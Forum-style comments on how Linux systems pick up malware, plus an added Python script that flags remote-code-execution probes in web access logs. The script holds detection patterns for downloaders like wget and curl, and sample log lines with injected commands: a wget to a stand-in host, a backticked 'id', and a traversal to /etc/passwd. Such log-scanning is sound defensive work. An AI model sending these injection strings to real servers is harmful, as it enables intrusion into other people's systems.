Downloading binaries from should-not-be-trusted sources, and executing/installing them is one way. There is some irony in having to do exactly that with this scanner. But, anyway, you may not have everything you want in your distribution, so you may have to resort to that in some cases.
There are subtler ways to download binaries and scripts from elsewhere, depending on what you use, like Steam games, python/js/perl/etc. repositories, browser extensions, adding new distribution repositories, and so on. Everything should be safe enough and should be checked, but as the xz problem showed, that is not a fail-proof guarantee.
Also ML models, which are often distributed not as data (weights), but data wrapped in Python scripts that get to run arbitrary code and download stuff from the Internet.
If you have a public HTTP server somewhere, you can check its access logs. You'll find a lot of requests which try to exploit remote code execution vulnerabilities of some CMS or router firmware.
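One way to do the access-log check suggested in the comment above, as an added example that is not part of the original thread. The combined log format, the heuristic patterns and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed format: Apache/nginx "combined" access log.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) ')

# Heuristic signs of command-injection / RCE probing (illustrative, not exhaustive).
SIGNS = {
    "shell-metachar": re.compile(r'[;|`]|\$[({]'),
    "downloader": re.compile(r'\b(wget|curl|tftp|busybox)\b', re.I),
    "traversal": re.compile(r'\.\./'),
    "cgi-path": re.compile(r'/cgi-bin/', re.I),
}

# Constructed sample lines (documentation IP ranges, reserved .invalid host).
SAMPLE_LOG = """\
192.0.2.10 - - [10/Apr/2024:06:25:11 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2024:06:25:14 +0000] "GET /cgi-bin/status.cgi?host=127.0.0.1%3Bwget%20http://example.invalid/x HTTP/1.1" 404 153 "-" "-"
203.0.113.5 - - [10/Apr/2024:06:26:02 +0000] "POST /admin/ping?addr=%2560id%2560 HTTP/1.1" 200 87 "-" "-"
198.51.100.7 - - [10/Apr/2024:06:27:40 +0000] "GET /static/..%2f..%2fetc/passwd HTTP/1.1" 400 0 "-" "-"
192.0.2.10 - - [10/Apr/2024:06:28:00 +0000] "GET /blog/post?id=42 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

def decode(s, rounds=3):
    """Undo nested percent-encoding so double-encoded input is still matched."""
    for _ in range(rounds):
        t = unquote(s)
        if t == s:
            break
        s = t
    return s

def scan(lines):
    """Return one dict per request whose decoded request line matches a sign."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # blank or malformed line
        ip, request, status = m.group(1), decode(m.group(2)), int(m.group(3))
        tags = sorted(name for name, rx in SIGNS.items() if rx.search(request))
        if tags:
            # A flagged request answered below 400 reached a handler: review it first.
            hits.append({"ip": ip, "status": status, "tags": tags,
                         "request": request, "review": status < 400})
    return hits

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG.splitlines()):
        print(h["ip"], h["status"], ",".join(h["tags"]), "REVIEW" if h["review"] else "-", h["request"])
```

Only the request line is inspected here; payloads carried in headers such as the User-Agent would need the same treatment on those fields.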
Manually downloaded scripts from websites, which are then run as root. The website will tell you that that's how it works, and to "trust me bro".
The target audience is the same "computer expert" who runs anything he downloads onto his Windows 7 PC as admin, because that solves a lot of issues usually™.